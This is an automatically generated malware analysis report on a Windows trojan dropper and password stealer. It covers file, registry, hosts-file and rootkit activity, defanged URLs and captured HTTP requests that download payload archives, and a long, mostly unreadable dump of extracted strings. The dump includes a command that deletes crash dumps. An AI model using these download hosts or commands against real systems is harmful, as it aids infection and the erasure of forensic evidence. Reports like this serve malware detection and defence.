Trojan.Win32.FlyStudio_b6e34f92da

by malwarelabrobot on July 7th, 2017 in Malware Descriptions.

Trojan-Dropper.Win32.Sysn.cequ (Kaspersky), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR, GenericPhysicalDrive0.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan-PSW, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: b6e34f92da5a3147abd76ed7db41a998
SHA1: b0527daddbd8bacc5f025ae2ceea380cb84ca167
SHA256: 83fe434ed0d5ba16f52ece19883e74476ff140d1bf1e2e86d81c31b0c70fb6a4
SSDeep: 49152:z05vr9B71qHfYRDum0PYFTgim gELi7jAUAx4FLjEce68HhXa9aI/Wlp08fmp9gM:oxr9B1wfoDGPYFMimGYjA3x4VjEY8MUE
Size: 2905046 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-04-11 17:17:05
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

29c2bf.exe:1480

The Trojan injects its code into the following process(es):

%original file name%.exe:3424
2bcd58.exe:3416

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process 29c2bf.exe:1480 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\Config[1].rar (230 bytes)
C:\Windows\System32\drivers\UnlockCallback.sys (5 bytes)
C:\Windows\Temp\1.sys.rar (1810 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\SafeWall[1].rar (2765 bytes)
C:\Windows\Temp\Config.dat (230 bytes)

The Trojan deletes the following file(s):

C:\Windows\System32\drivers\UnlockCallback.sys (0 bytes)

The process %original file name%.exe:3424 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\2bcd58.exe (678 bytes)
C:\Windows\29c2bf.exe (586 bytes)

The process 2bcd58.exe:3416 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\drivers\etc\hosts (826 bytes)

Registry activity

The process 29c2bf.exe:1480 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\29c2bf_RASAPI32]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"windowsw"

The process 2bcd58.exe:3416 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To run itself automatically each time Windows boots, the Trojan adds a link to its file under the following system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"windowswf" = "C:\Windows\system32\2bcd58.exe"

Dropped PE files

MD5                               File path
bc881d19f64bd9748f1b813005dea5b4  c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\SafeWall[1].rar
affb554b9180479f961bfcaa5e3a45af  c:\Windows\29c2bf.exe
e25533277b22c9d342ac26cfebb4f9b8  c:\Windows\System32\2bcd58.exe

HOSTS file anomalies

The Trojan modifies the "%System%\drivers\etc\hosts" file, which is used to map host names to IP addresses.
The modified file is 2044 bytes in size. The following entries are added to the hosts file:



Rootkit activity

Using the driver "%System%\SafeWall.sys", the Trojan intercepts the loading of executable images into memory by registering a load-image notify routine.
The Trojan installs the following kernel-mode hooks:

NtDeviceIoControlFile

Propagation

VersionInfo

Company Name:
Product Name:
Product Version: 1.1.0.0
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.1.0.0
File Description:
Comments:
Language: Chinese (Simplified, PRC)

PE Sections

Name   Virtual Address  Virtual Size  Raw Size  Entropy  Section MD5
UPX0   4096             1945600       0         0        d41d8cd98f00b204e9800998ecf8427e
UPX1   1949696          2478080       2477056   5.45223  3453f73c1ac1d38e1a6bf6359a594ce6
.rsrc  4427776          249856        249344    4.74224  b0822e02537042aeed35a2b6af52282b
.gda   4677632          4096          1536      0        53e979547d8c2ea86560ac45de08ae25

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL                                         IP
hxxp://x6.tianyuanfalan.com/Config.rar      139.224.223.3
hxxp://x6.tianyuanfalan.com/SafeWall.rar    139.224.223.3
www.hqkjwy.com                              125.77.31.224
teredo.ipv6.microsoft.com                   157.56.106.189


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY HTTP Request on Unusual Port Possibly Hostile
ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

GET /Config.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: x6.tianyuanfalan.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Sat, 13 May 2017 04:35:51 GMT
Accept-Ranges: bytes
ETag: "5b76ba66a2cbd21:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 06 Jul 2017 01:38:49 GMT
Content-Length: 230



GET /SafeWall.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: x6.tianyuanfalan.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Wed, 03 May 2017 18:05:56 GMT
Accept-Ranges: bytes
ETag: "feab39e937c4d21:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 06 Jul 2017 01:38:52 GMT
Content-Length: 18944

The Trojan connects to the servers at the following location(s):

6]%X[tl}T
k\<Ts<\%SHK
_&NI%Xh0U
f%u9]
%DjLhV
\UWSSHh
 "UDp
(.ni0
\k-.dE
>.Ptm|tc
.QTC!
PBi@.HD
%C$$$
[.LUr
D(.YPW
%X@!L
l(%U4:
jF RSSh6
%CIt#
Çc$
}%U4s
A.tCD
9 .pk
xlÕ7
x S%u' J
.PSad
^}%.x2
h.ly&
.hd\R
6.uL/
SFC.kwFt
x%xD?
<#,user32.dll
6ACC.DLLT
[lzndowPr8AkF.eg
hXXp://w
.hqkjwy.c
C:\WIN
102.54.9
38.25.63.10xyp
/.- *)(''&%$$#""!!
%*.*f
.Arm.
*OCmdT"
..HLP
SVCRTgr
X`hB.trp
.PAVC@@)I
%s:%d)
RIFF%x
1.6.7
.Ehho
!Gl.chs\S-
cKey
UrlA3%
}.mKK;
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>PAD
RASAPI32.dll
WININET.dll
.text
`.rdata
@.data
@.reloc
j.Yf;
_tcPVj@
.PjRW
not supported
operation canceled
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
address family not supported
broken pipe
function not supported
inappropriate io control operation
InitOnceExecuteOnce
operator
operator ""
operator co_await
?#%X.y
%S#[k
?\\.\SafeWall
/c del /f /s /q c:\windows\minidump\*.*
C:\Windows\MEMORY.DMP
cmd.exe
C:\Windows\Temp\1.sys.rar
C:\Windows\Temp\1.key.rar
%s\SafeWall.sys
hXXp://x6.tianyuanfalan.com/SafeWall.rar
C:\Windows\System32\SafeWall.sys
%s\Drivers\SafeWall.sys
hXXp://x6.tianyuanfalan.com/SafeWall64.rar
C:\Windows\SysWOW64\drivers\SafeWall.sys
hXXp://x6.tianyuanfalan.com/sys.rar
%s\Temp\sys.dat
%s\Temp\sys.key
%s\Temp\sys64.dat
%s\Temp\sys64.key
%s\Drivers\UnlockCallback_x64.sys
C:\Windows\SysWOW64\drivers\UnlockCallback_x64.sys
%s\Drivers\UnlockCallback.sys
C:\Windows\System32\drivers\UnlockCallback.sys
\*.dat
\temp\Config.dat
hXXp://x6.tianyuanfalan.com/Config.rar
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
windowsw
c:\Windows\Flags
C:\Users\dumingqiao\Desktop\Phoenixer\Release\Phoenixer.pdb
.text$di
.text$mn
.text$x
.text$yd
.idata$5
.CRT$XCA
.CRT$XCAA
.CRT$XCC
.CRT$XCL
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XLA
.CRT$XLZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$T
.rdata$r
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data
.data$r
.tls$
.tls$ZZZ
.rsrc$01
.rsrc$02
KERNEL32.dll
ExitWindowsEx
RegOpenKeyExA
RegDeleteKeyA
urlmon.dll
CertGetNameStringA
CryptMsgGetParam
CertFindCertificateInStore
CertFreeCertificateContext
CertCloseStore
CryptMsgClose
CRYPT32.dll
SHDeleteKeyW
SHLWAPI.dll
imagehlp.dll
PSAPI.DLL
GetCPInfo
.?AU_Crt_new_delete@std@@
h.rdata
H.data
.reloc
c:\users\dumingqiao\desktop\source\objfre_win7_x86\i386\EnumRemoveCmpCallback.pdb
ntoskrnl.exe
7%7U7
.pdata
c:\users\dumingqiao\desktop\source\objfre_win7_amd64\amd64\EnumRemoveCallback.pdb
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
<VeriSign Class 3 Public Primary Certification Authority - G50
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
hXXps://VVV.verisign.com/cps0*
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
pk.x6cs.com
hXXp://pk.x6cs.com:88/
ECInf->Key%x
Hash%x
ECInf->FileBufferLen%d
sf999.com
fhdlq.com
28pk.com
ggwoool.com
wooolsf.com
5b.com
125.88.181.
183.60.200.
45woool.com
44woool.com
zhaowoool.com
zhaocs.com
huocs.com
fireol.com
8cs.com
jielesh.com
woool2017.com
600sf.com
xlcomic.com
021sjjc.com
45ci.com
bdtiandao.com
lke5.com
45woool.org
zjlscnc.com
guanmei2008.com
dtggc.com
93u.com
woool2sf.com
chinahuaman.com
176fgcqsf.com
shaibar.com
ucwoool.com
65535cs.com
quwoool.com
88woool.com
HTTP/1.1 301 Found
Location: %s
c:\users\dumingqiao\desktop\projects\safewall\safewall_x86\objfre_win7_x86\i386\SafeWall.pdb
KeDelayExecutionThread
ZwDeleteKey
ZwOpenKey
KeStallExecutionProcessor
HAL.dll
Hash %x
ECInf->Key %x
ECInf->BB %x
in line:%d
c:\users\dumingqiao\desktop\projects\safewall\safewall_amd64\fucksys.c
at file:%s
c:\users\dumingqiao\desktop\projects\safewall\safewall_amd64\objfre_win7_amd64\amd64\SafeWall64.pdb
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
0/070@0_0
9 :0:4:8:<:
8 8$8(8,8
=/>4>;>_>
4 4$4(4,4
;0<@<\<`<|<
Software\chuanshi\web
\Data\config\ItemCfg.INI
\Data\config\default\bestitem.INI
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
HTTP/1.1
hXXps://
hXXp://VVV.hqkjwy.com:88/h.txt
vreport
windows
Battle.net
$Recycle.Bin
data\woool.dat.update
Software\Microsoft\Windows\ShellNoRoam\MUICache
\0-49-3d.nmp
dWEbo
úG0
n#e.jzPxt
.Dt[:js
U#y.aPKwH
]4O%UMp&
2cpÞ
g^.Lt
=.Rx>/
V=.ev&2
.WKM\-
t%DkT
.rO@]
V.rP?
CE.rC
.NaEb
.qPzM
.oKty[
M.nN-H
fB%s:
Q~(%c
8.Ww4
P.Dy4
" .eXqit
Yh2%Ud
S.jLu
V\jiangjunling01.nmp
\jiangjunling02.nmp
Oi%xK_<
^t%dk
-d}Gt
3s4%U
\wuxing.nmp
%sBdN
%sJdN
:1975/08/21
Http://
VBScript.RegExp
Adobe Photoshop CS2 Windows
2011:12:22 11:54:23
urlTEXT
MsgeTEXT
hXXp://ns.adobe.com/xap/1.0/
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="3.1.1-111">
<rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
xmlns:exif="hXXp://ns.adobe.com/exif/1.0/">
xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/">
xmlns:xap="hXXp://ns.adobe.com/xap/1.0/">
<xap:CreatorTool>Adobe Photoshop CS2 Windows</xap:CreatorTool>
xmlns:xapMM="hXXp://ns.adobe.com/xap/1.0/mm/"
xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#">
<stRef:documentID>adobe:docid:photoshop:4de4def4-ecd0-11e0-9a10-a9350357c235</stRef:documentID>
xmlns:dc="hXXp://purl.org/dc/elements/1.1/">
xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/">
IEC hXXp://VVV.iec.ch
.IEC 61966-2.1 Default RGB colour space - sRGB
CRT curv
.fM,k
.kp:S
?idWF.fE
-0 /2#25"27$6;#7>"7?#=C$@F&CJ*FM-IP0JQ/KQ1MS1NT4PW3OV4PW6RY7SZ8T[6Q[7SZ8TZ7SZ7SZ5QW4QT5QW4OY3PW4QX3PW3PW3PW3PW4QX4PW4PV7SY7SZ6RY7SZ7SZ6RY7SZ8SV4PV3PW2OV4PW5QX4PW3OV3PW4PW3OV5PZ2OV4PW6RX6SZ9SY7SZ7SZ8T[6SY8TZ4PV4PV4PW4PZ4PZ3OY3OY3PW3OY5PZ4NZ5PZ4OY4OY5PZ4OY5QX7SZ:UX7SY7SZ7SZ7SY7SZ6RY-IS4RU4OY:TZ.JT
 .Zv|Qkw
-2#16"27$49"6=$9@$>D&@F(DK)EL,HO-IP0KU2MW3OV3OV3OV5QX6RX7SY7SY7SZ8S]7SZ7SY8TZ3OU5QX4PV4PV1QV0PU3PV4QW2OV3PW1NU4QX3OV7SZ5QX7SZ7SZ6RY8T[6RY7SY3OU5QW4PW4PV5QW5RX3PV4PW6RY3OV5QX4PW3OV7SZ7SZ8T[5QW8U[8TZ5RX6SY4QW3PW3PW5QX3OV5QX4PW5QX5QW4PV3QT3PV3PV3PW5QX3OV5QX6RY7SY7SZ7SZ7SZ8T[9U\8RY0JQ6N[.PV9R\-HT
-2!16"27$49"6=%9@$>E$@G(DK)DN*FP-IS/JT3NX4PW3OV3OV4PW6RY7SZ7SZ7SZ8T[7SY5RX8TZ3OU5QW4PW4PV0PV/OT4QW4QW1NU5RY1NU4QX4PW7SZ6RY6RY7SZ6RY8T[7SZ8T[2NU5QX3OV4PV5QW4RU2PS4PW6RY3OV5QX4PW3OV7SZ7SZ8T[5QW8U[8TZ5RX6SY4QW3PW3PW5QX3OV5QX4PW5QX5QW4PV3PV3PV3PV3PW4PW5QX5QX6RY7SY7SZ7SZ7SZ8T[9U\8RY0JQ6N[.PV9R\-HT
###$$$"""$$$&&&
!!! !!! """ """###!!!
|||___^^^"""
...---,,,---   ,,,,,,,,,......---...,,,---...---///...111...000222000///...000HHHJJJEEEDDD444,,,   111.........111000>>>EEEEEE???444......111   ///???EEEGGGEEE555000000.........111111000---///BBBFFFCCCEEE555000   ,,,,,,...444<<<BBBGGGAAA...------...---///111...---EEEKKKMMMOOO888/////////---   ///000...111   000///***///---,,,///,,,...KKKKKKMMMCCC???333   ***---,,,,,,------...///..................---------//////------///***,,,,,,FFF&&&
???<<<222444555666
777666333777
@@@<<<333888666555
999???@@@???>>>@@@
%%%XXXXXXXXXLLL
...RRR]]]^^^\\\\\\___^^^JJJ
999888666444
888999000
!!!999;;;===:::)))
...vvv
[[[(((&&&|||
]]]___"""
###$$$%%%$$$%%%
 / /2"14"36i&8=$8@%<D'@J'BL)DN,HO.JQ/KR1MT1MW2OV2OV3PW7SZ7SZ7SZ6RY7SY7SY7SY7SY4PW5QX4PW4PW4PW4PW4PW4PW4PW5QX4PW4PW5PZ7R\9SZ9SY9SY9SY7SY7SZ9SY4PW3OY5RY4PW3OV4OY4PZ4OY6PW4PW4PW5QX4PV6RX7SY7SY7SY7SZ7SZ7SZ7SZ4PW5QX4PW5QW4PV4PV5QX3PW4PW7QX4OY5PZ4OY5PZ4PW4PW4PW6RY9SY7SZ7SZ6RY9SY:T[6RY/KU3PW4PZ9SY/KR
05!38#5:%7<&8=%<D&@G*DK*FM,HO.JQ0KU1LV2NU3OV3OV4PW7SY7SY7SY7SZ:T[9SZ6RY8T[3PW5QX4PW4PW5QX4PW4PW4PW4PW4PW4PW4PW5QX7SZ7SZ7SZ7SZ7SZ7SZ7SZ5T]4PZ4OY6OY4OY4OY3PW1QW3NZ3NZ3NZ3NZ3NZ3NZ6Q]7R^9SZ7QX9R\:T[6RY7SZ3NX4OY3OV4PW4PW4PW4PW5QX4PW3PV3PW4QX3OY4OY4OY3NX4PW7SZ9U[6RY7SZ8T[8T[6RY8T[.JQ4QW4PW9TW/JT
)0.JQ 7?Dbm
}}}|||~~~
,,,!!!???...XXX
   ...rrr
......,,,---,,,---------...000......---///...---/////////////////////000...DDDFFFFFFGGG---IIICCCBBB>>>777444...//////000111///222,,,///000......///000555///000000HHHIII<<<000.../////////000...///000   :::FFF777   ,,,......666<<<BBBIII===///------...   ///---...---EEEKKKMMMMMM666000///...---...///111///...---222......,,,,,,000000------JJJKKKNNNFFFAAA111---))),,,,,,...---......///.........///...---,,,,,,---...111,,,,,,000   ,,,,,,EEE&&&
>>>===444555444666
SSSHHH"""
---444333555444
>>>999444666555444
...555:::444666:::
000:::888999:::888<<<888
???@@@===///
...NNN;;;;;;<<<<<<<<<<<<<<<<<<<<<======<<<:::===<<<===>>>===???===>>>===999<<<<<<EEE'''
...SSSGGG))) !!!
...lll!!!
;;;777000
:::999888999   
...jjjlllnnnkkklllkkklllnnnjjjnnnkkklllmmmnnnjjj
###%%%###$$$%%%
|||{{{|||}}}~~~|||~~~
!!!###***
@@@```~~~
999(((555>>>
111""">>>$$$
888///,,,
111...///
;;;---111
(((444((()))
EEE444111111...LLL
333   ---   ...OOO
"""'))***$$$
$$$***)))555999)))%%%
222:::888555666[[[
%''(%'$#%
$'#(&&%&(
!!!###$$$(((&&&
"""'''((("""
"""'''   """
$$$%%%'''%%% ###(((***$$$ )))...!!!
!!!888...;;;
!!!&&&!!!
&&&   (((,,,   ,,,)))%%%""" $$$
"""&&&$$$###$$$'''&&&!!!
$$$   ,,,((($$$   &&&
!!!'''"""
$$$'''&&&### %%%$$$
"""'''***'''&&&   $$$
###&&&%%% %%%(((***$$$!!!%%%
'''...111 ###
&&& &"*(('''$$$'''"""
$$$###"""%%%)))'''###)))111555444333
###%%% !!!$$$..."""(((&&&
%%D4111
%!"%"(((###"""###!!!
"""...((($$$&&&'''"""
 (*3.1./1346$!%
)))$$$&&&(((%%%
,,,((( ((()))!!!
&&&'''&&&!!!
###(((   %%%"""
###---***!!!
''',,,"""
222^^^%%%
%%%!!!###%%%$$$
""")))&&& ###
   """ $$$)))%%%((()))!!!
!!!$$$'''###
*&'(((&&&'''%%%$$$"""
)))""" !!!&&&###
$$$%%%&&&"""
!!!'''&&&###%%%
,,,%%% ###!!!"""
###'''"""
"""'''$$$ ###
''')))***,,,)))!!!&&&
$&&&%'&$$'''
%%f6   ***$$$!!!###!!!
#"&'&((&&!&%'%%,**###"""###!!!
! # "#!!!
$),)""" $$$!!!
"""'''&&&
%%%..."""
FFF???)))<<<;;;...EEEKKK999TTT```,,,
(((...CCCmmmdddddd222
'''(((''''&(!$!!"
###$$$"""
~~~```@@@
'''666''')))
000@@@~~~
)))***"""
'''.00,**)))%##
. )022230...'))
-&  ""!#
"'()(%!"$
###'''(((###
$$$%%%'''%%% ###(((***$$$ )))...!!!
$$$(((&&&)))---   ((($$$ &&&###
&&&***(((,,,   ,,,)))%%%""" $$$
*=@%CO
!'#$&&&$&&'''$$$'''"""
***55589=866
" !#%&"(((###"""###!!!
"""!!!%%%'''
'&(((('''&&&%%%###"""
!!!###%%%'''(((&&&$$$!!!$$$)))&&&###%%%'''###"""$$$!!!
%##%&#(((#%%&'$
$&&%$&(%#"($   ###"""###!!!
" () """ $$$!!!
'&()(%&')%%%%"$
---   ***___
888!!!888%%%...PPP
999'''555>>>
111"""===%%%
999///,,,
(((666((()))
'''000   )))$$$
---000222...)))
...qqq???
###((("""
!!!111!!!
!!!###%%%'''&&&
...;;;|||
"""''',,,"""
""")))***!!!
$$$%%%'''&&& ###)))***$$$ )))...!!!
$$$'''&&&)))---,,,((($$$ %%%###
!!!%%%!!!
$$$***,,,((($$$   &&&
$$$'''%%%### %%%$$$
&&&   '''!!! )))&&&
&&&!!!$$$
###&&&%%%
%%%(((***$$$"""&&&!!!
'''...111 ###
###%%% !!!$$$..."""((('''
%%33111
(((555;;;777
!!!###&&&)))&&&"""%%%'''   ,,,''',,,)))((('''###
"""...(((###&&&'''"""
!!!%%%   ((($$$ ###$$$%%%!!!
###''',,,%%%"""
###---)))!!!
''',,,!!!
%%% $$$%%%$$$
""")))''' $$$
"""'''###!!!$$$(((###
   """ %%%)))%%%((()))!!!
"""$$$(((###
&&&((('''&&&%%%###"""
###&&&(((,,,   ***)))&&&
!!!###%%%'''(((&&&$$$!!!$$$)))&&&$$$%%%'''###"""$$$!!!
)))""" """&&&###
!!!$$$###
'''&&&###%%%
!!!&&&(((&&&"""!!!
''')))***,,,(((!!!&&&
$$$%%%(((%%%&&&
%%%&&&%%%""",,,###"""###"""
!!!""" """(((""" $$$!!!
%%%---!!!
GGG@@@)))<<<;;;...FFFKKK999SSS___,,,
&&&"""'''&&&###
(((...CCCmmmdddccc222
'''&&&'''$$$"""
###%%%"""
-2!16 27!6:%7<(7?%<D&@G'CJ)EL,HO/KR/LS1NU2MW3NX3NX4PW7SY7SZ7R\6Q[6SZ5RY6RY8T[2NU4PW4PW4QX4PW5QX3OV4PW4PW4PW5QX4PW4PW7SZ8T[6RX8TZ7SY8TZ7SY6RY5QX4PW5QX3PW4PW3PV5QW3PW4PW4PW4PW3OV4PW7SY7SZ7SZ7SZ7SZ7SZ5RY7SZ3PV3OU4OY4PW4PW6PW4PW3OY3NX6PW5QX4OY5PZ5PZ4PW4PW4PW7SZ9SY7SY6RX7SY7SY8RX8T[.JT3NZ7QW7SY,LR
(.Vju
/4!08%4<%7<$9=%<C&@F)CI)EK,HO-JQ.JT1MW2OV2OV2OV3PW7SZ7SZ6RY6RY7T[6SZ6RY8T[3OV4PW4PW4PW3PW5QX3OV4PW3PW3PW3OV4PW4PV7SY7SY8TZ8TZ6RX8TZ8TZ7S]3OY4PW4PW3OV2OV4QX0PV3OV4PW3OV4PW5QX3OV7SZ7SZ8RY8RY6RY7SZ7T[7SZ5QX4PW4PW4PW6RY3OV4PW5QX2NU4QX4PV3OU4PW6PW6RY5QX5QX7SZ8TZ9U[6RY7SZ:T[7SZ7SZ/KR5PZ5OV8RY.KQ
]{~.JQ"<BY{
,1 05#38$49%7<'9>%<D(?G)CI EK,HO.JQ0LS2NU3OV3OV3OV4QW6RX7SZ7SZ7SZ8T[7SZ6RY7SZ5QX5QX4PW4PW4QX2OV4QX3PW4QW4QW3PV4QW6RY6RY7SZ7SZ6RY8T[7SZ7SZ7R\4OY3OY4QX2OV2OV3PW3PW4PV5QX4PW4PW4PW4PV5QW8TZ7R\6Q[7SZ8T[6SZ6SZ4PZ3OY4PW3OV7QX6PW5OV6PW3OV5QX3PV3PV3OU4PV4PV3OU4PV7SY6SZ7SZ7SZ7T[6SZ9U\5QX1MT3PW3PW6RX/HX
/// ???...XXX
"""###"""###"""!!!
~~~___^^^"""
......---...------...---...///......---......---...------...//////---...///...000EEECCCDDDCCC///111///333//////333555GGGHHHGGGGGG......111000///666<<<444000111000//////000...///...999FFFFFF@@@999333,,,111......---***...444;;;<<<>>>888,,,---...000000...,,,///,,,666MMMMMMLLLDDD888000111---...111---//////---///000------...LLLJJJMMMLLL---,,,...???MMMMMMKKK999,,,      ---...---/////////.........///---,,,   ------...000---      ---,,,DDD(((
((('''&&&))),,,)))(((
%%%***'''
<<<:::555444888
???<<<333555&&&
>>>@@@777888
...DDD;;;:::;;;777
...KKK@@@===@@@???!!!
...CCC
...TTTAAAAAABBBAAA!!!
...LLL
444\\\...
444,,,000---
...mmmjjjkkkllllllmmmnnnmmmlllllljjjmmmooommmkkkmmmkkkooolllnnnmmmlllccceeeeeebbb'''lllccc
$$$%%%###%%%###
)1.JQ
 0 .3"14"36#5:$8?$9=#=D&@G'BL)DN,HO-IP/KR2NU2NU3OV3OV5QX5QX7SZ6R\6R\7SY7SY7SZ7SZ5QW4PV4PW4OY4OY4OY4OY4OY4PW4PW4PV3OU3PW6SZ7T[6RY7SZ7SZ7SZ7SZ6RY5QW3OV4OY5QX3NX4NZ4OY4PZ4PW4PW3PW4PZ5QX7SY7SY7SZ7SZ7SZ7R\6SZ6RY4PW4PV4PW4PW4PW4QX3PW4QX3PV4PV4PW4PW4PW4PW4PW4PW5QX9SZ7SZ8TZ8TZ7SY7SY8T[6Q[/JT3PW1QV7Q].KQ
-IZ.J[.KZ0JZ'>T
.1!25"27!38&8=%:>&=E%?F EL)DN-HR-HR0JV1KW1NT3OU3OU4PV6SV6SV6RX:TZ7T[6SZ5QX8T[2NU6RY4PW4PW4OY5PZ2LX5O[5O[3MY5O[4NZ5QW6RX7SY8TZ6RX7SY6RX7SY7R\6Q[4OY1NU4PZ4PZ4PZ5QX4PW5QX4PW5QX4PW4PW8TZ7SY7SY7SZ7SZ7SY6RX6RX4PW4PW4PW3OV6PW6PW4PW4PW2NT5QW3PW3PW4OY5PZ3NX3MY5PZ6Q[8TZ6RX7SY8TZ8U[7SY7SY.JQ3QT2NX9TW.IS
